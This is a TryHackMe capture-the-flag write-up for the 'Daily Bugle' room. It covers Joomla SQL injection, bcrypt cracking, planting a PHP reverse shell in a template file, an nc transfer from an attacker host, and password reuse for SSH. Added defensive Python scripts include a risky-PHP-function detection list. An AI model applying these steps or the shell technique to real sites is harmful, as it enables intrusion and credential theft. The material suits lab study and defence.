Daily Bugle (THM)

TryHackMe Daily Bugle Write-Up

topics: web application security, SQL injection, locating/modifying public exploits, cracking hashes, Post-exploitation, Linux privilege escalation

  1. Plan

  2. Enumeration

  3. Local Privilege Escalation (Exploitation)

  4. Root Privilege Escalation

new tools:

tools: nmapAutomator, dirsearch, searchsploit, python, john, kali webshells, ssh, sudo, yum, gtfobins

Plan

We are given a description of the room: "Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum." Well we know exactly what to do on this machine.

Enumeration

Initial nmap scan: ./nmapAutomator.sh $ip Basic

We have three ports open: 22 (SSH), 80 (HTTP) and 3306 (MySQL). !!!search hacktricks for enum tech!!! The nmap scan also reveals some potential subdirectories within the webserver.

Versions/Platforms

  • SSH: OpenSSH 7.4

  • HTTP: Apache httpd 2.4.6 (CentOS) PHP/5.6.40

  • MySQL: MariaDB (unauthorized)

Let's navigate to the website, run dirsearch and find a Python script to enumerate MySQL (or use the mysql tool).

python3 dirsearch.py -u $ip -e php,html,txt

Many subdirectories were found. The ones we have access to include:

  • /administrator - login page

  • /bin - nothing there

  • /cache - nothing there

  • /configuration.php - nothing there

  • /htaccess.txt - no critical information

  • /includes - nothing there

  • /robots.txt - lists these directories

  • /templates - nothing

  • /tmp - nothing there

  • /web.config.txt - no critical information

We know the platform being used (per the description and nmap) is Joomla. We need to see if we can find which version it is running to search for relevant exploits.

I attempted to find default creds for the admin login page, but a unique password is required on installation.

After having no luck finding the version on the 200-code subdirectories, I decided to google how to find the version in Joomla, leading me to this website.

Next suggestion:

The last suggestion is this file in the same directory. dirsearch returned that nothing was left in the /language subdirectory, but perhaps it was outside the scope of the default wordlist.

So, we have Joomla version 3.7.0.

./nmapAutomator.sh $ip Vulns also revealed the version and CVE-2017-8917.

Local Privilege Escalation

Let's use searchsploit joomla 3.7

SQL Injection

SQLmap (and, I believe, the MySQL tool) are disallowed on the OSCP exam, so we will have to search for a public script for CVE-2017-8917.

Looking up "CVE-2017-8917 github" leads us to this Python Joomblah script.

This exploit did not work on Kali 2020, so I used Kali 2018 to run it: python joomblah.py http://<victimIP>

Password Cracking

So we found creds: a user jonah with a hashed password of $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm

hash-identifier was unable to determine the type of hash, so let's seek alternative methods. Sometimes the leading characters are an indicator of the type of hash, so if we search for "$2y$10$ hash"

Now (still using Kali 2018) let's store the hash in a file, unzip rockyou and crack the hash with john: john --format=bcrypt --wordlist=rockyou.txt hash
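The "$2y$10$" prefix that gave the hash away is part of the modular crypt format: the field between the first two "$" names the scheme, and for bcrypt the next field is the cost factor. Tools that guess from length and character set miss this, which is why reading the prefix is the reliable way to pick john's --format. The parser below is an added example (not from the write-up or from john) that pulls the scheme, cost, salt and digest out of a hash string; the prefix-to-format table is my own and covers the common crypt(3) schemes alongside bcrypt.

```python
import re

# Modular-crypt-format prefix -> John the Ripper --format name.
# Assumption: this table is mine; only the bcrypt prefix appears in the write-up.
PREFIX_TO_JOHN = {
    "1": "md5crypt",
    "5": "sha256crypt",
    "6": "sha512crypt",
    "2a": "bcrypt",
    "2b": "bcrypt",
    "2y": "bcrypt",
}

# bcrypt: $<variant>$<2-digit cost>$<22-char salt><31-char digest>, bcrypt base64 alphabet
BCRYPT_RE = re.compile(r"^\$(2[aby])\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")


def parse_bcrypt(hash_str):
    """Split a bcrypt hash into its fields and derive the work factor."""
    m = BCRYPT_RE.match(hash_str)
    if not m:
        raise ValueError("not a well-formed bcrypt hash")
    variant, cost, salt, digest = m.groups()
    cost = int(cost)
    if not 4 <= cost <= 31:
        raise ValueError("bcrypt cost must be between 04 and 31")
    return {
        "variant": variant,
        "cost": cost,
        "rounds": 2 ** cost,      # key-setup iterations the cost factor implies
        "salt": salt,
        "digest": digest,
        "weak_cost": cost < 10,   # below 10 is cheap to brute-force on modern hardware
    }


def identify(hash_str):
    """Identify a password hash from its modular-crypt prefix.

    Returns the scheme and the matching john --format; bcrypt hashes are
    additionally broken into their fields. Hashes with no '$' prefix
    (raw MD5, SHA-1, ...) are reported as unknown rather than guessed.
    """
    if not hash_str.startswith("$"):
        return {"scheme": "unknown", "john_format": None, "prefix": None}
    prefix = hash_str.split("$")[1]   # index 0 is '' because the string starts with '$'
    john = PREFIX_TO_JOHN.get(prefix)
    if john is None:
        return {"scheme": "unknown", "john_format": None, "prefix": prefix}
    info = {"scheme": john, "john_format": john, "prefix": prefix}
    if john == "bcrypt":
        info.update(parse_bcrypt(hash_str))
    return info


if __name__ == "__main__":
    # The hash recovered in the write-up
    found = "$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm"
    for key, value in identify(found).items():
        print("%-12s %s" % (key, value))
```

For the hash above this reports scheme bcrypt, cost 10 (1024 rounds), a 22-character salt and a 31-character digest, so the john invocation the write-up uses (--format=bcrypt) follows directly from the prefix. From the defender's side, the cost field is the knob that decides how expensive each guess is; a cracked Joomla hash is usually a weak password rather than a weak algorithm.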

Now that we have creds jonah:spiderman123 we can log in to the /administrator page. We know that the server is coded in PHP, so let's see if we can find a location to upload and run a PHP shell, and search for Joomla 3.x shells as well.

Initial Shell

The home page for admins

There is a /configuration section and an /extensions section; it would be wise to check these places first. The extensions section has an "install" option, and there are usually files to edit in configuration settings.

There was no area to upload files in the site settings option. Navigating to /templates:

It seems like we have found where to upload our PHP shell. This page allows us to edit the files within the site templates, save them and execute them upon navigation. It would be unwise to rewrite the entire home page /index.html with our shell. Picking a more discreet file such as /error.php would make more practical sense in terms of evading detection.

Edit Kali's default php reverse shell (/usr/share/webshells/php) to include the attacker IP, replace the entirety of /error.php and save.

Load the page http://<victimIP>/templates/protostar/error.php

Initially I tried to use this Joomla 3.x shell I found. Though I had issues getting it to run properly: it would accept the site and exit without returning anything. Another writeup I found discussed how they used the tokens from the original joomblah script to get it to work. It's worth reading and worth coming back to. Although there is little advantage to using this script, as you still need to know the login creds, it does automatically find a file in /templates to rewrite.
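The reason the template editor is such a convenient foothold is also what makes it easy to watch: template files are static assets that should not change between releases, so a hash baseline plus a scan of any changed PHP file for execution primitives catches exactly the edit described above. The script below is an added example written from the defender's side (not part of the write-up or of Joomla); the directory layout, the risky-function list and the constructed tamper of protostar/error.php are all mine.

```python
import hashlib
import os
import tempfile

# PHP functions a template file has no business calling. Assumption: this
# list is mine; tune it to the code base being monitored.
RISKY_TOKENS = ("shell_exec", "exec(", "system(", "passthru", "proc_open",
                "popen(", "fsockopen", "eval(", "base64_decode")


def snapshot(root):
    """Return {relative_path: sha256-hex} for every file under root."""
    digests = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def compare(baseline, current):
    """Diff two snapshots into added, removed and changed paths."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def risky_tokens(path):
    """List the RISKY_TOKENS that appear anywhere in a file."""
    with open(path, "r", errors="replace") as fh:
        text = fh.read()
    return sorted(t for t in RISKY_TOKENS if t in text)


def audit(root, baseline):
    """Compare the tree against its baseline and flag new/changed PHP files
    that reference command execution or socket/obfuscation primitives."""
    report = compare(baseline, snapshot(root))
    report["flagged"] = {}
    for rel in report["added"] + report["changed"]:
        if rel.endswith(".php"):
            hits = risky_tokens(os.path.join(root, rel))
            if hits:
                report["flagged"][rel] = hits
    return report


def demo():
    """Constructed scenario: baseline a template tree, then tamper with error.php."""
    with tempfile.TemporaryDirectory() as root:
        tpl = os.path.join(root, "protostar")   # template name from the write-up
        os.makedirs(tpl)
        original = "<?php defined('_JEXEC') or die; ?>\n<html><body>Page not found</body></html>\n"
        for name in ("index.php", "error.php"):
            with open(os.path.join(tpl, name), "w") as fh:
                fh.write(original)
        baseline = snapshot(root)
        # Constructed tamper: the file now references a command-execution
        # function, as a template overwritten with a shell would. It is a
        # marker string only, not working PHP that executes anything.
        with open(os.path.join(tpl, "error.php"), "w") as fh:
            fh.write("<?php // constructed sample, not a working shell\n$f = 'shell_exec'; ?>\n")
        return audit(root, baseline)


if __name__ == "__main__":
    print(demo())
```

In the demo the report lists protostar/error.php as changed and flags it for shell_exec while index.php stays clean. In production the baseline would be taken from the release package (or a package manager's file list) and the audit scheduled, so an administrator-account compromise that ends in a template edit shows up as a file-integrity event rather than as the first sign of a reverse shell in the access log.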

SSH

Since there is no TTY present currently, we cannot use sudo -l.

As we are the user apache, we cannot access the user.txt flag just yet, as it is in /home/jjameson. We know that SSH and MySQL are still open, so let's transfer LinPEAS with nc.

on Kali:

nc -nlvp 4444 < linpeas.sh

on victim:

cd /tmp
nc <attackerIP> 4444 > linpeas.sh
chmod 777 linpeas.sh
./linpeas.sh >> LIN.txt

We could simply cat LIN.txt, but let's look for something more interesting. We know the user is jjameson, so let's search for a potential password: cat LIN.txt | grep password

Hmm, a password nv5uz9r3ZEDzVjNu is revealed. Let's attempt to SSH into jjameson using this password.

It's important to note this password was found in a PHP configuration file.
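A CMS has to keep its database password in plaintext somewhere, so the two things a defender can actually control are who can read that file and whether the secret is reused for anything else (here it was also the SSH password). The check below is an added example (not from the write-up or from Joomla) that reports a configuration.php that is world-readable or that carries plaintext credential fields; the field names it looks for and the constructed sample file are my assumptions.

```python
import os
import re
import stat
import tempfile

# Joomla-style "public $name = 'value';" lines for fields that hold secrets.
# Assumption: the field list is mine.
CRED_RE = re.compile(r"public\s+\$(password|secret|smtppass)\s*=\s*'([^']*)'")


def audit_config(path):
    """Return a list of findings for a CMS configuration file.

    Flags the file if any other user on the host can read it (the failure
    mode that let a web-server shell read the password), and reports which
    credential fields are populated so they can be checked for reuse.
    """
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & stat.S_IROTH:
        findings.append("world-readable (mode %o)" % mode)
    with open(path, "r", errors="replace") as fh:
        for key, value in CRED_RE.findall(fh.read()):
            if value:
                findings.append("plaintext %s present (%d chars)" % (key, len(value)))
    return findings


def demo():
    """Constructed scenario: a config file at 0644, then tightened to 0640."""
    sample = (
        "<?php\n"
        "class JConfig {\n"
        "    public $user = 'placeholder-db-user';\n"
        "    public $password = 'placeholder-db-password';\n"   # constructed, not the box's value
        "    public $secret = 'placeholder-secret';\n"
        "    public $smtppass = '';\n"
        "}\n"
    )
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "configuration.php")
        with open(path, "w") as fh:
            fh.write(sample)
        os.chmod(path, 0o644)
        loose = audit_config(path)
        os.chmod(path, 0o640)
        tight = audit_config(path)
        return loose, tight


if __name__ == "__main__":
    loose, tight = demo()
    print("0644:", loose)
    print("0640:", tight)
```

With the sample at 0644 the audit reports the world-readable mode plus populated password and secret fields (the empty smtppass is skipped); at 0640 only the credential findings remain, which is the expected state: the file must hold the password, so the remaining control is making sure that password unlocks nothing but the database.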

Root Privilege Escalation

sudo -l

So we have sudo permissions for the yum command. Yum is the standard package manager utility for Red Hat-based Linux distributions (CentOS, Fedora). We can also read the /etc/os-release file to confirm this is CentOS running kernel 3.10.0. Perhaps we can find an exploit if this sudo privilege is a rabbit hole.

Let's see if yum is included on GTFOBins.
